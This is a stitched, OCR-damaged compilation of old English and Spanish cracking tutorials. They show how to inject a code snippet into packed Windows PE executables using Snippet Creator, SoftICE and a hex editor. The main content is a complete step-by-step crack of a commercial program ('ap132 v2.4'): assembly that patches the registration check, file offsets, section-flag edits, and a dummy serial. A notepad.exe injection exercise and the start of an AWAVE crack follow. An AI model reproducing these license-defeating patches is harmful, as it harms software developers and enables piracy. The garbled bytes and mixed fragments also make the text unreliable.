- Snippet Creator will not restaurate the original instruction of the program. We'll have to do it. 


We write the snippet and assemble it. This is the code snippet, to assembler with TASM v5.0 


jmp init 


oldinstl db 00Fh,084h,0A7h,014h,000h,000h 
oldinst2 db 0E9h,0E9h,09Fh,OFEh,OFFh,09Eh 
newinstl db 068h, 020h,099h,041h,000h, 0C3h 
newinst2 db OFEh,0COh,090h 

counter db O 


init: 

pushad 

cmp counter,0 
jne time2 


; Restaurate instruction 1 
inc counter 


mov edi,41A110h ; address of the original instructions: VAO 
lea esi,oldinstl ; instruction to restaurate 

mov ecx,6 push ecx ; size of the original instructions 

rep movsb ; move it 


; Write new instruction 1 

mov edi,41B5D2h ; address of the next jump to the snippet: VA1 
lea esi,newinstl ; instruction to writel 

pop ecx ; size of the instructions 

rep movsb 


; Return 1 
popad 

push 41A110h 
ret 


time2: 

; Restaurate instruction 2 

mov edi,41B5D2h ; address of the original instructions: VA1 
lea esi,oldinst2 ; instruction to write 

mov ecx,6 


rep movsb 


; Write new instruction 2: patch 2 


mov edi,404822h ; address of the patch 2 : VA22 
lea esi,newinst2 ; new instruction to write 

mov ecx,3 ; number of bytes to write 

rep movsb ; Writte them 

; Return 2 

popad 

push 41B5D2h 

ret 


Then that we have written this lines in the edit window of Snippet Creator, we press the 
"Assembly" button and wait. If there isn't error, the snippet code has benn assembled and linked. 
Before to do this, we must execute the command ActionVOptions to display the General 
Options dialog box. If you have TASM, you select "TASM" and push the "Default" button. 


Last, we save the binary. This is optional: FilelExport and we save api32.bin. This is the binary 
file of the code snippet. 


We open the ap132.exe file with HexWorkshop. We go to the 00D320 h offset. Is the offset where 
we will place the code snippet. 


We open the ap132.bin file that we have exported. We tag 1t all and copy 1t (CTRL+C). We go to 
the 00D320h offset of the api32.exe file and tag it from 00D320h unitl 0OD39Eh. Now we paste 
the snippet. To end, we set in the 00D510h offsset the instruction that gives the control to the 
snippet: 68 20 99 41 00 C3. This means: 


:0041A110 68 20 99 41 00 push 00419920 
:0041A115 C3 ret 


Note that this snippet code has been placed in the .rsrc section. Revise the characteristics of this 
section: PE InfoWView Section Info. The characteristics of the .rsrc section are: 40 00 00 40 h. 
This means: 


Initialized data: 00 00 00 40 h 


Readable: 40 00 00 00 h 
40 00 00 40h 


Our snippet set to 1 the variable 'count' in this section, so that this section has to be writeable. To 
do this we do clck with the right button of the mouse over the string .rsrc that appears in the 
"Section Information" dialog box. We select "Edit Section" in the emergent menu: this display 
the "Modify Section Values” dialog box. We pulse the button "...” beside from the 
"Characteristics" field. This display the "Section Charactheristics” dialog box. We select the 
IMAGE_SCN_MEM_WRITE check box and save. Now the characteristics of the .rsrc section 
will be: CO 00 00 40 h: 


Initialized data: 00 00 00 40 h 

Readable: 40 00 00 00 h 

Writeable: 80 00 00 00h 
CO 00 00 40 h 


That is all. 


Registering 


Now we start the program and click on register. We type a name with more than five character: 


My_Name 


and a seral code of more than sixteen characters: 


FREE-FREE-FREE-FREE 


Click OK, and all right... 


Comments and observations: 


nuMIT orO iname.com 


CRACKEAR ARCHIVOS PE 
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HexWorkShop 
Softlce 
TASM v3.0 
Puedes conseguir estas herramientas en http://members.xoom.com/crk10/archivos 


http://welcome.to/karpotff 


Autor: nuMIT_ or 


Intro 


Ya he escrito un tutorial sobre Snippet Creator donde trato el tema de quebrar protecciones en 
archivos ejecutables PE enpacados. Me he dado cuenta que era un escrito muy duro para 
principiantes y he reorganizado un material que pudiera ser seguido mejor y con más facilidad. 


Sin embargo, para poder seguir este tutorial se requiere una experiencia mínima en lenguaje 
ensamblador orientado al sistema operativo Windows a 32 bits, conocimiento de las estrategias 
clásicas de desprotección de programas (las comunes), algunas nociones sobre la estructura de los 
archivos con formato PE. De alguna manera supongo también conocimietos sobre desempacado 
manual de archivos con ProcDump. 


El Camino 


El método clásico de crackear archivos PE empaquetados consiste en usar un parcheador de 
procesos (process patcher) y hacer el parche estratégico en tiempo de ejecución. Se trata de 
esperar hasta que el archivo sea desempacado en la memoria para su ejecución y entonces 
parcharlo. Para hacer esto, tenemos que tener el manejador del proceso. 


Tenemos entonces que un parchador de un proceso se puede dividir en dos partes: 
un cargador: una rutina que carga el proceso objeto generalmente en modo de depuración. 


un parchador: una rutina que intercepta el proceso, toma el control y escribe el parche en el 
proceso. 


Yo nunca he usado este método. Uso otro, también clásico: injertar un recorte de código que 
tome el control del programa cuando éste se ejecuta, sobre-escriba el archivo objeto en tiempo de 
ejecución y haga los parches necesarios en puntos estratégicos. Estos puntos estratégicos son 
direcciones virtuales del proceso o desplazamientos dentro del archivo: 


1. Final de la rutina que desempaca el archivo : Desplazamiento 1 - VA1 (Virtual Address 1) 

Todo archivo ejecutable necesita ser desempacado para correr. El código con que comienza el 
programa que contiene este archivo es un "cargador" [ loader | que desempaca el archivo en 
memoria. Cuando la rutina termina, el archivo objeto es desempacado en memoria, y podemos 
parcharlo en este momento. Una vez alcanzado el final del "cargador" del archivo empacado, el 
archivo ya debería estar desempacado en la memoria, así que a partir de la dirección de las 
últimas instrucciones del cargador escribimos unas nuevas instrucciones que hacen que el 
programa pase el control a un recorte de código que hemos insertado estratégicamente dentro del 
archivo empacado. Este recorte parchará entonces el archivo de manera que quedan rotas las 
protecciones que impiden su disfrute. A la dirección dónde termina de ejecutarse el cargador del 
empacado la llamamos VA1. 


2. Un lugar para el recorte. Desplazamiento 1 - VA2 (Virtual Address 2) 

Tenemos que especificar dónde colocaremos el recorte de código parchador que romperá la 
protección del programa. Este código ha de recibir el control desde el cargador que desempaca el 
programa cuando éste es ejecutado. Cuando el recorte se ejecuta, re-escribe algunas instrucciones 
que eliminan las protecciones y restaura las instrucciones que le entregaron el control para que el 
programa siga su curso y devuelve el control al programa. Para hacer el parche, la sección del 
archivo PE a parchar debe ser "escribible" (writeable), de lo contrario se producirá un error de 
protección. A la dirección donde colacamos el recorte la llamamos VA2. 


3. La dirección de la instrucción a parchar: VA3 (Virtual Address 3) 
Todavía tenemos que romper la protección del archivo. Esto no lo podemos hacer a la manera 


clásica, directamente sobre los desplazamientos característicos con un editor hexadecimal porque 
el archivo objeto está empaquetado. Podemos localizar las instrucciones a parchar y sus 
direcciones con un depurador (debugger) como Softlce y luego proceder a parchar el archivo con 
código que podemos introducir en un punto estratégico del ejecutable empaquetado. El problema 
es que generalmente los empacadores al empacar un archivo ejecutable PE, cambia las 
características de sus secciones, evitando que Softlce, y otros desensambladores, se detengan en 
ciertos del programa. Para que Softlce pueda revisar un programa de estos, debemos revisar las 
características de las secciones del archivo ejecutable para asegurarnos que las secciones de 
código tengan las características típicas que les convienen. 


4. Escribir y ensamblar el recorte. 

Si tenemos éxito en el intento de romper la protección que nos mortifica, debemos proceder a 
escribir un recorte de código enensanblador (es lo más pequeño y rápido), ensamblarlo y pegarlo 
en el archivo objeto donde hemos establecido. 


¿Eselcamino? 


A veces encontramos que las instrucciones finales del cargador del archivo empaquetado también 
están empacadas. Así que tenemos que esperar que estas últimas instrucciones sean 
desempacadas antes de parcharlas para que entreguen el código al recorte. Para resolver esto, 
podemos pasar el control a nuestro recorte parchador antes de que la rutina cargadora llegue al 
final. ¿Cuándo? cuando las instrucciones finales del cargador hayan sido desempacadas. 
Entonces tenemos que agregar algunas instrucciones adicionales al recorte para que éste parche 
primero las últimas instrucciones del cargador y éste pueda entregar de nuevo, por segunda vez, 
el control al recorte. La segunda vez que el recorte tiene el control, parchará el código original 
del programa y eliminará sus protecciones. 


5. Dirección de la primera llamada al recorte: VAO. 

Bien, el recorte recibirá entonces el control dos veces. La primera vez, parchará las últimas 
instrucciones de la sección del archivo encargada de desempacar el programa; este parche 
consiste en un par de instrucciones que entregarán el control al recorte por segunda vez. En esta 
última ocasión, el recorte ejecutará una nueva rutina que parchará el programa en memoria y lo 
desprotegerá. A la dirección que entrega el control por primera vez al recorte lo llamamos VAO. 


<<On the way>>(Do you remember Jack Kerouack?) 


Crackear un archivo empacado empleando este método es sencillo con Snippet Creator, una 
herramienta hecha para injertar código nuevo en archivos ejecutables con formato PE. Así que 


consigamos este programa, corrámoslo y creemos un proyecto nuevo: FilelNew project. Este 
comando desplegará una ventana donde podrás seleccionar el archivo que deseas cambiar o 
desproteger y dar un nombre al proyecto. Cuando creas un programa, Snippet Creator crea un 
subdirectorio con el nombre que tú eliges y un archivo .INI que salva la información y permite 
reabrir el proyecto. 


1. Final de la rutina desempacadora: Desplazamiento 1 - VA1 (Virtual Address 1) 


Nuestro objetivo será ap132 v2.4. Para registrar este programa y obtener todas sus funciones 
podemos buscar y calcular su serial. Pero he visto que esto puede resultar un trabajo largo y 
arduo. Á veces es preferible (menos trabajo - mejor resultado, +ORC) parchar el archivo 
ejecutable cuando se pueda. Tomaremos este camino. 


Primero tenemos que ubicar el final de la rutina que desempaca el archivo. Cargamos el 
programa con Softlce y bajamos de alguna manera (usando la tecla F10, y ocasionalmente F5 y 
F9 para evitar los bicles [ loops ] ) hasta 00 41 B5 D2. 


Esta instrucción es un salto [ jump ] al punto de entrada original del programa en la sección .text: 


:0041B5BD 8B 64 24 14 mov esp, dword ptr [esp+14] 
:0041B5C1 SE pop esi 

:0041B5C2 8B FE mov edi, esi 

:0041B5C4  81C6D7150000 add esi, 000015D7h 
:0041B5CA  6A 05 push 00000005h 

:0041B5CC. 59 pop ecx 

:0041B5CD — F3 repz 

:0041B5CE — A4 movsb 

:0041B5CF 61 popad 

:0041B5DO  669D popf 


:0041B5D2 E9E09 9F FE FF jmp 004055C0h ; <- Salto al punto de entrada original 


La instrucción en la dirección 00 41 B5 D2 es donde termina el cargador interno del programa 
empaquetado. Llamamos a esta dirección VA1. 


En esta dirección tendremos que escribir una instrucción de seis bytes que tiene la forma: 


l: push address_of_snippet 
A 


Estas instructiones entregarán el control al recorte. Un código con esta forma tiene un tamaño de 
seis bytes. En octal: 


l: 68 zz yy xx 00 
2 - “ES 


El código octal 68h es la instrucción empujar a la pila [ push ] un dato dword. El resto de la 
instrucción es un número hexadecimal de 32 bits que será empujado a la pila: 00 xx yy zz h; este 
número es la dirección a la que saltará el programa con la siguiente instrucción. Así que la 
instrucción 1 será en ensamblador: 


push 00 xx yy zz h 


El código octal C3h corresponde a la instrucción en ensamblador 'RET". Esta instrucción hace 
que el programa salte a la dirección a la que apunte el registro SP o ESP (el puntero de pila). En 
este caso es la dirección 00 xx yy zz h en la memoria virtual del proceso y que antes metimos en 
la pila. 


Pero todavía hay un problema. La instrucción original en VA1 también está empacada; entonces 
tenemos que esperar hasta que esta instrucción sea cargada para escribir un primer salto [ jump ] 
al recorte: tendremos que localizar otra dirección VAO anterior a VA1 que entregue una primera 
vez el control al recorte: en esta primera ocación, el recorte sobre-escribirá la instrucción en la 
dirección VA1 para que en VA 1 el programa entregue nuevamente el control al recorte. La 
segunda vez que el recorte recibe el control, parchará el programa y lo desprotegerá. Por último 
restaurará las instrucciones originales que reescribió antes. 


Una buena dirección para dar el control al recorte por vez primera es: 
:0041A110  0F84A7 1400 00 je 0041B5BDh 
Llamamos a esta instrucción VAO. ¿Cómo conseguirla? 


Cargo el programa con el loader de SoftIce. Cuando se despliega la ventana de Softlce, ejecuto el 
comando "D 41B3D2". Luego voy trazando las diversas instrucciones del programa con la tecla 
F10 hasta ver como se realiza un cambio en la dirección 41B5D2 en la ventana de datos. Seguro 
aparecerá algo como " FE9FE9 E9  FFFEB5 BB", que son los valors octales de las 
instrucciones siguientes, pero invertidas: 


:0041B5D2  E9E09 9F FE FF jmp 004055C0h ; <- Jump to the original entry point 
:0041B5D7 E9BB B5 FE FF jmp 00406B97h 


Entonces, cuando el programa llega a 00 41 Al 10 h, las instrucciones en la dirección 00 41 B5 
D2 h estarán desempacadas y podrán ser parchadas. 


2. Un lugar para el recorte. Desplazamiento 1 - VA2 (Virtual Address 2) 


Para ubicar un lugar para el recorte podemos emplear un método bastante empírico pero que 
funciona. Abrimos el programa con un editor hexadecimal como HexWorkshop y buscamos un 
sitio sin código, lleno de ceros. Estos espacios amplios genertalmente podemos encontrarlo al 
final de las diversas secciones. Así que podemos encontrar un espacio amplio al final de la 
sección .rsrc, en el desplazamiento 00 D3 20 h. 


Podemos elegir este espacio. Tenemos el desplazamiento dentro del archivo, pero necesitamos su 
dirección virtual. Esta dirección la podemos calcular con esta fórmula: 


(Desplazamiento del recorte - Desplazamiento del inicio de la sección) + VA de la Sección 
A esta dirección la llamamos VA2. 


Ya hemos determinado la sección donde pondremos el recorte .rsrc. Para hacerlo ejecutamos en 
Snippet Creator PE InfoWView Section Info. Podemos ver que este desplazamiento está en la 
sección .rsrc, antes de la sección "madmat". El desplazamiento de inicio de la sección [ Raw 
Offset of the section ] es 4A 00h. 


La dirección virtual de la sección [ VA of Section ] es: Dirección de la base de la imagen [ Image 
Base Address | + Desplazamiento virtual de la sección [ VA offset of the section ]: 


00 40 00 00h +00 01 00 00 h = 00 41 00 00 h 
Ahora calculamos: 
VA2 = (00 D3 20h - 00 4A 00h) + 00 41 00 00h = 00 41 99 20h 


Esta es la dirección VA2. 


3. La dirección a parchar: VA3 (Virtual Address 3) 


Ahora vamos a desproteger el programa. Por razones de brevedad, considerando que el lector de 
este tutorial no es propiamente un principiante, no detallaré el proceso para ubicar el punto a 
parchar. Simplemente lo diré. Para que el programa corra como si estuviera registrado, con todas 


sus funciones, debemos cambiar en el siguiente código: 


:00404815 03EA add ebp, edx 
:00404817 41 inc ecx 
:00404818 4E dec esi 
:00404819 T5DA jne 004047F5 
:0040481B 33C0 xXor eax, eax 
:0040481D SF pop edi 
:0040481E 85ED test ebp, ebp 
:00404820 SE pop esi 
:00404821 5D pop ebp 
:00404822 0F94C0 sete al 
:00404825 SB pop ebx 
:00404826 59 pop ecx 
:00404827 C3 ret 


La instrucción: 
:00404822 0F94C0 sete al 


Es donde el programa coloca una bandera en el registro al para indicar si el programa está 
registrado o no. Si esta instrucción pone 1 en al, el programa está registrado. Entonces podemos 
cambiar esa instrucción de tres bytes por 


:00404822 FECO inc eax 
:00404824 90 nop 


Esta instrucción hará a al diferente de cero. Cuando el programa revise la bandera, actuará como 
si el programa hubiera sido registrado y actuará como tal. 


Aunque esto sería suficiente para registrar el programa, todavía necesitamos introducir nuestro 
nombre de ususario y el serial. El programa revisa el número de caracteres en el nombre de 
usuario (debe ser mayor que cinco) y el de la clave (debe ser 16 o más). 


Bien. ya tenemos la dirección de los parches. 


4. Escribir y ensamblar el recorte. 


Tenemos que crear el proyecto en Snippset Creator: FilelNew project. Lo llamamos api32. 


Luego configuramos las opciones del proyecto: 


Snippet VA = VA2=41 99 20 

Patch Options = Patch into Existing Section 

Address to Redirect Control To the Snippet = Redirect Control From Code Section 
VA1 =00 40 17 75 

Return Control to the program = Don't Return Control To Program 


Estas opciones eligen: 


- la dirección virtual donde el recorte será injertado (VA2) 

- el recorte será injertado dentro de una sección existente (.rsrc) 

- la dirección virtual donde el programa dará el control al recorte (VA 1) 

- el recorte no regresará el control al programa; tenemos que hacerlo nosotros y escribirlo en el 
recorte. 

- Snippet Creator no restaurará las instrucciones originales del programa. Tenemos que hacerlo 
nosotros. 


Luego escribimos el recorte y lo ensamblamos. A continuación está el código del recorte para 
TASM v5.0. Antes de ensamblar el recorte debemos elegir y configurar el ensamblado que 
usemos. Ejecutamos en Snippet Creator ActionvOptions para desplegar la ventana "General 
Options". Escogemos el ensamblador (TASM o MASM según sea el caso) y establecemos los 
comandos y parámetros correspondientes. En mi caso particular, que he empleado TASM v5.0, y 
tengo a Snippet Creator en el directorio CAASMNCZA, los valores y comandos son: 


Assembler 

TASM 

Locations 

Assembler: TASM32 /ml %1 

Linker: TLINK32 /Tpe /c /aa /V4.0 %1,,CATAILIB úmport32.lib 


Project Directory: CiASMUCZA 


Estos comandos suponen que el directorio donde tengo TASM32.EXE y TLINK32.EXE, está en 
entorno; es decir, cuando inicio la sección en Windows, el archivo por lotes "autoexec.bat" tenía 
la siguiente línea: 


PATH  CATASMIBIN;¡CATASMLIB;¡CATASMUNCLUDE;%PATH% 


A contiuación el código del recorte: 


jmp init 


oldinstl db 00Fh,084h,0A7h,014h,000h,000h 
oldinst2 db 0E9h,0E9h,09Fh,OFEh,OFFh,09Eh 
newinstl db 068h, 020h,099h,041h,000h, 0C3h 
newinst2 db OFEh,0COh,090h 

counter db O 


init: 

pushad 

cmp counter,0 
jne time2 


; Restaurar la instrucción 1 
inc counter 


mov edi,41A110h ; dirección de la instrucción original 1 en VAO 
lea esi,oldinstl ; instrucción a restaurar 

mov ecx,6 push ecx ; tamaño de la instrucción original 

rep movsb ; restaurar la dirección original 


; Escribir la nueva instrucción en VA1: segundo salto al recorte 

mov edi,41B5D2h ; dirección donde se volverá a entregar el control al recorte: VA1 
lea esi,newinstl ; instrucción a escribir 

pop ecx ; tamaño de las instrucciones 

rep movsb 


; Retorno 1 
popad 

push 41A110h 
ret 


time2: 

; Restauar intrucción 2 

mov edi,41B5D2h ; dirección de la instrucción original 2 en: VA1 
lea esi,oldinst2 ; Instrucción a restaurar 

mov ecx,6 

rep movsb 


; Write new instruction 2: patch 2 
mov edi,404822h ; dirección de la instrucción original 2 en : VA2 


lea esi,newinst2 ; instrucción a escribir 
mov ecx,3 ; tamaño de las instrucciones 
rep movsb ; escribirlas 


; Retorno 2 
popad 

push 41B5D2h 
ret 


Después de escribir estas lineas en la ventana de edición de Snippet Creator, presionamos el 
botón "Assemble" y esperamos. Si no hay error, el recorte de código ha sido ensamblado y 
enlazado. 


Ahora podemos "exportar" el binario correspondiente al recorte (FilelExport) y salvamos 
api32.bin. 


Abrimos el archivo api32.exe con HexWorkshop (conviene más emplear este editor que HIEW, 
ya que necesitamos tener dos vistas desplegadas al mismo tiempo, una del archivo api32.exe y 
otra del recorte api32.bin). Vamos al desplazamiento 00D320 h ( Edit/Goto ). Es el 
desplazamiento donde colocaremos el recorte de código. 


Ahora abrinos el archivo api32.bin que hemos exportado. Lo marcamos totalmente con el ratón y 
lo copiamos (CTRL+C). Luego desplegamos la vista de api32.exe y vamos al desplazamiento 
00D320h y marcamos desde 00D320 hasta V0OD39Eh. Ahora pegamos el recorte (CTRL+V). Para 
terminar, ponemos en el desplazamiento 00D510h (correspondiente a la dirección virtual VAO) la 
instrucción que entrega el control al recorte por primera vez: 68 20 99 41 00 C3. Esto significa: 


:0041A110 68 20 99 41 00 push 00419920 
:0041A115 C3 ret 


Recordar que el recorte ha sido colocado en la sección .rsrc. Como sobrescribimos esta sección 
con alguna instrucción debemos asegurarnos que soporte escritura. Revisemos las características 
de la sección .rsrc: PE InfoWView Section Info. Las características son: 40 00 00 40 h. Esto 
significa: 


Datos Inicializados: 00 00 00 40 h 
Lectura: 40 00 00 00 h 
40 00 00 40h 


La sección no soporta escritura, así que tendremos que editar las características. Para hacer esto 
hacemos click con el botón derecho del ratón sobre la cadena .rsrc que aparece en el cuadro de 
diálogo "Section Information". Seleccionamos "Edit Section" en el menú emergente: esto 
despliega el vuadro de diálogo "Modify Section Values". Pulsamos el botón "...” al lado del 
campo "Characteristics". Esto despliega el cuadro de diálogo "Section Charactheristics". 
Seleccionamos la caja de chequeo IMAGE_SCN_MEM_WRITE y salvamos ( save ). Ahora las 
características de la sección serán: CO 00 00 40 h: 


Datos Inicializados: 00 00 00 40 h 


Lectura: 40 00 00 00 h 
Escribible: 80 00 00 00h 
CO 00 00 40 h 


Esto mismo lo tenemos que hacer para todas aquellas secciones que serán escritas durante el 
proceso, como el cargador del empacado, que es la sección con que inicia un ejecutable 
empaquetaso. Eso es todo. 


Registrando 


Ahora corremos el programa y pulsamos el botón 'register'. Escribimos un nombre con más de 
cinco caracteres: 


Mi_Nombre 


y un código serial con más de dieciseis caracteres: 


FREE-FREE-FREE-FREE 


Hacemos click sobre OK, y listo... 


Gracias a Karpoff por sus observaciones. 


Comentarios y correcciones: nuMIT_orOiname.com 
Mi página de programación: nuMIT_ors Programming Page 
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MASM 6.X o TASM 5.0 
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Insertar un objeto nuevo en un archivo PE 
El recorte es grande y no quiero aumentar el programa 


MALDITAS PROTECCIONES: quebrando a AWAVE v4.5 
ALGUNAS PREGUNTAS - ALGUNAS RESPUESTAS 


- ¿Las ¡mp de las apis están siempre en secciones .text? 
- ¿Qué significan las características de las secciones de un PE? 
- ¿Qué es una DLL y para qué sirve? ¿cómo se crea? 


Particularmente veo el mayor potencial de conocer los encabezados del PE en la personalización 
de programas. Sin un editor de recursos se puede cambiar el comportamiento de los menúes, de 
los diálogos y mucho más. También podríamos ampliar la funcionalidad de las aplicaciones y 
mejorarlas. Es un trabajo que podemos hacer "manualmente", sin necesidad de un programa 
especial para ello. 


Insertar un objeto nuevo en un archivo PE 


Como un ejercicio, vamos a insertar una rutina nueva en notepad.exe. Es la libreta de notas que 
trae el sistema Windows, generalmente en el directorio CXAWINDOWS. Así que copialo y 
guárdalo en un directorio temporal ya que le haremos algunos cambios. 


Para insertar rutina nueva en notepad.exe vamos a utilizar Snippet Creator. Existen otras 
herramientas que pueden hacerlo también, pero yo utilizo ésta. 


Repasemos como configurar Snippet Creator para insertar código nuevo en un archivo PE. 
1. Debemos primero hacer unos ajustes: vamos a Action/Options. 
No sé si sea necesario explicarlo, pero hay que: 


1.1. Indicar si usarás MASM o TASM. Son los ensambladores comerciales más 
populares. 


1.2. Para cada uno de ellos, si los tienes, eliges los comandos con sus respectivos 
comutadores. 


1.3. Hay que indicar también el directorio donde será creado el proyecto es decir, 
la rutina que injertarás en el PE. 


1.4. OK. 


1.5. Si prefieres y no eres tan quisquilloso, simplemente pulsa DEFAULT y se 
establecerán los valores por defecto. No es una mala opción. 


2. Ahora debes crear un proyecto (File/New Project) u opcionalmente determinar el target 
(Acton/New Target). A nuestro proyecto nuevo lo podemos llamar NP. 


3. Luego viene lo interesante: crear el recorte (snippet). Hay que escribir el código del recorte 
en la ventana de edición del programa. Los siguientes son más o menos los ejemplos de lcz: 


Para MASM: 


include windows.inc 
include user32.inc 
includelib user32.lib 
jmp init 


Message db "Probando, un, dos, tres. probando",0 


init: invoke MessageBox,NULL,addr Message, NULL, MB_OK 


Para TASM: 


UNICODE=0 
include w32.inc 
jmp ComienzoReal 


Message db "Probando, un, dos, tres. probandot",0 


ComienzoReal: call MessageBox,NULL,offset Message, NULL,MB_OK 


Ahora guarda el código escrito ("File/Save Project"). Snippet Creator creará en la carpeta del 
proyecto un archivo .INF que salvará la información sobre los avances realizados en el proyecto. 


Es necesario observar que el código anotado arriba sólo funciona si, en este caso, MessageBox es 
una de las funciones importadas por el archivo target. Para asegurarse de esto, simplemente 
vamos a la ventana "Import Information" a través de "PEInfoWView Import Fuctions". Hacemos 
click con el botón derecho del ratón sobre USER32.DLL y revisamos. Ya, aparece la función 
MessageBox. 


4. El siguiente paso es ensamblar el recorte: pulsa el botón "Assemble" debajo de la ventana de 


edición o ejecuta el comando "Action/Assemble". Si todo va bien, vamos al siguiente punto. 


5. Exportar el recorte. Al ejecutar el comando "File/Export", se abre la caja de diálogo común 
"SAVE AS". Busca la carpeta del proyecto y salva el archivo .BINSe trata del recorte 
propiamente dicho. Si lo abres con HIEW.EXE (Hacker View) podrás ver un desensamblado de 
lo que escribiste. Esto ya es bastante. Puedes tomar el contenido de este archivo y pegarlo 
manualmente en el sitio indicado del target y ya. Pero SC te puede ahorrar este trabajo. 


6. Ahora el momento crucial: injertar el recorte en el target. Para hacer primero debes ejecutar 
el comando "Acton/Project Options”. Esto desplegará una caja de diálogo donde: 


6.1. Debes llenar la caja VA con la dirección virtual donde deseas insertar el 
recorte (snippet). Para esto, hay que encontrar un punto disponible dónde 
hacerlo. Los sitios posibles son: 


a. Al final del archivo, como una nueva sección. Esto 
incrementa el tamaño del archivo. 


b. Entre las tablas de las secciones y la primera sección. 
También como una nueva sección. 


Cc. En algún espacio no utilizado de una sección. Pienso que esta 
es la mejor opción ya que no tiene que crearse una nueva 
sección ni aumenta el tamaño del archivo. 


Para ubicar el sitio donde ubicar el recorte, abrimos el target con un editor 
hexadecimal y buscamos un área vacía, llena de ceros. Una vez encontrada, 
anotamos el desplazamiento donde empieza y el desplazamiento donde termina. 
En mi versión de notepad.exe, por ejemplo, hayamos un gran espacio en el 
desplazamiento 4020h (revisa tu versión, si esto no es posible elige otro 
desplazamiento). Luego, empleando el comando "PE Info/View Section Info", 
abrimos el diálogo "Section Information” y en la columna "RAW offset" 
revisamos en cual sección se halla el espacio que he elegido. Es la sección .data. 
Luego calculamos la dirección virtual equivalente al desplazamiento dentro del 
archivo: 


VA del recorte = (Desplazamiento del recorte - RawOffset de la Sección) + 
(ImageBase + VirtualOffset de la sección) 


(00004020h - 00003E00h) + (00400000h + 00006000h) = 00406220h 


Colocamos este valor en el campo "Snippet VA" del diálogo "Project Options". 


6.2. Según sea la opción que hayamos elegido, hay que indicarlo en el área 
"Patch Options" de la caja de diálogo "Project Options”. Elijamos "Patch into 
Existing Section". 


6.3. Después de escoger dónde insertar el recorte, debemos decidir como el 
recorte ha de tomar el control. 


Si queremos que el código se ejecute antes del código del 
archivo objeto o víctima, debemos redirigir el control desde el 
punto de entrada RVA (opción "Redirect Entry Point RVA””). 
Con esta opción, el programá dará el control al recorte cuando 
el archivo esté listo para ser ejecutado. 


Si queremos que el recorte reciba el control después de que 
algunas rutinas del archivo objeto se haya ejecutado, debemos 
elegir entre dos opciones: "redirect-from-code-section" 
(redirigir-desde-la-sección-de-código) o "redirect-from- 
call/¡mp" (redirigir-desde-call/¡mp). La opción "redirect-from- 
code-section" insertará las instrucciones en la dirección virtual 
que pasará el control al recorte. Sin embargo, debes tener 
cuidado al elegir la dirección desde donde redirigirás el 
control: debe estar en el límite de una instrucción. Por ejemplo, 
para una sección como esta: 


:00401007 6819304000 push 00403019 

:0040100C 6A00 push 00000000 

* Reference To: USER32.MessageBoxA, Ord:0195h | 
:0040100E E807000000 Call 0040101A 

:00401013 6A00 push 00000000 


puedes escoger 40100C como la dirección de redirección, pero 
no 40100D. Snippet Creator no será capaz de capturar este tipo 
de error, así que debes ser cuidadoso en esto. Para pasar el 
control al recorte, Snippet Creator reemplazará la(s) 
instrucción(es) en esa dirección virtual con "push [VA del 
recorte]" y luego"ret". 


Redirection from call/jmp es otro método. Esta opción requiere 
que se diga a Snippet Creator donde está la instrucción call/¡mp 
y automáticamente reemplazará la instrucción original call/¡mp 
con la dirección de tu recorte. En este ejemplo, si empleamos 
esta opción, debemos pasar 40100E como la dirección virtual 


que redirigirá el control. Snippet Creator almacena esta 
dirección, la de rutina original, en una variable llamada 
OriginalLocation. Luego, si se desea entregar de nuevo el 
control a la rutina original, en el recorte se puede hacer algo 
como "¡mp dword ptr [OriginalLocation]" o "call dword ptr 
[OriginalLocation]", dependiendo de si originalmente era una 
llamada (call) o un salto (jump). 


Si prefieres redirigir el control desde algún sitio en el código 
existente, puedes almacenar las instrucciones sobre-escritas 
después de que tu recorte obtenga el control. Lo puedes hacer 
estableciendo la caja de chequeo (checkbox) restore-overwritten- 
instruction en la parate inferior del cuadro de diálogo "Project 
Option”. Snippet Creator colocará el código necesario para 
restaurar las instrucciones originales dentro del recorte. 


Luego, hay que considerar qué hacer después de que la última 
instrucción del recorte haya sido ejecutada. Se puede elegir 
devolver el control al archivo objeto (target) en una dirección 
virtual específica. Si no, se debería poner alguna instrucción que 
sería la última del recorte, tal como ExitProcess. 


En nuestro caso particular, ya hemos calculado la dirección virtual del nuevo 
punto de entrada, que corresponde al desplazamiento donde colocaremos el 
recorte: 00406220h. Como queremos que nuestro recorte tome el control al 
iniciar el programa, elegimos la opción "Redirect Entry Point RVA". Esto dará 
el control al recorte desde el comienzo. Además queremos que el programa siga 
su curso después de la ejecución del recorte, entonces elegimos la opción 
"Return To Program" y en la casilla "Virtual Address” colocamos la dirección 
del punto de entrada original: 00401000. 


6.4. Una vez establecidas las opciones del proyecto, se inserta el recorte en el 
archivo objeto usando "Action/Patch Target File". Snippet Creator no preservará 
registros/banderas (flags), es tu responsabilidad. Si algo no funciona como se 
esperaba, se puede examinar el código fuente del recorte en el directorio del 
proyecto y ver cómo va todo. 


Listo. 


Ahora activemos el target (NOTEPAD). ¿Qué te parece? 


Icz termina su tutorial recordando que SC puede ser empleado también como un simple editor de 


archivos PE, lo mismo que ProcDump. 


El recorte es grande y no quiero aumentar el programa 


En ocasiones el tamaño del archivo empacado es un parámetro crítico a través del cual un sistema 
de protección puede evaluar si ha habido intento de abuso. En estos casos es posible implementar 
una DLL. Así sólo tengo que insertar la llamada a la DLL en el archivo objeto y listo. Si no sabes 


qué es una DLL, como se programa, y para qué sirve, revisa el final de este documento. 


MALDITAS PROTECCIONES: quebrando AWAVE v5.4 


Parchando archivos empaquetados con SnippetCreator 


Voy a intentar desproteger un programita llamado AWAVE v5.4. Es un programa ejemplar para 
mostrar como romper protecciones de archivos ejecutables empaquetados a través de la inserción 
de código nuevo en ellos empleando Snippet Creator. Quiero subrayar que no tengo nada contra 
el programador que creó este buen programa. Por el trabajo que me dio, tengo la impresión de 
que sabía lo que hacía. Yo aconsejaría que quienes deseen usar el programa, lo registren. Si yo 
pudiera lo haría. Pero mi objetivo no es aprovechar el programa sino enseñar el estilo de romper 
protecciones que estoy implementando. 


Para romper las protecciones de archivos empaquetados, la táctica empleada generalmente es 
esperar que el archivo se despliegue en memoria y sobreescribir la rutina de protección en tiempo 
de ejecución. Esto comúnmente se ha hecho con un cargador (loader) que atrapa una llamada a 
alguna API de W32 que realice el programa, y entrega el control a la rutina que desprotegerá el 
programa: el mismo cargador tomará el control y cambiará en memoria el esquema de 
protección. 


El uso de loaders me parece que presenta una dificultad: en este método entran en juego dos 
procesos distintos, el del loader y el del programa mismo. Esto dificulta las cosas y nos obliga a 
escribir un número significativo de líneas de código. Las funciones de W32 para escribir 
procesos remotos, son complejas. El loader puede tener fácilmente un tamaño de 100 KB, 
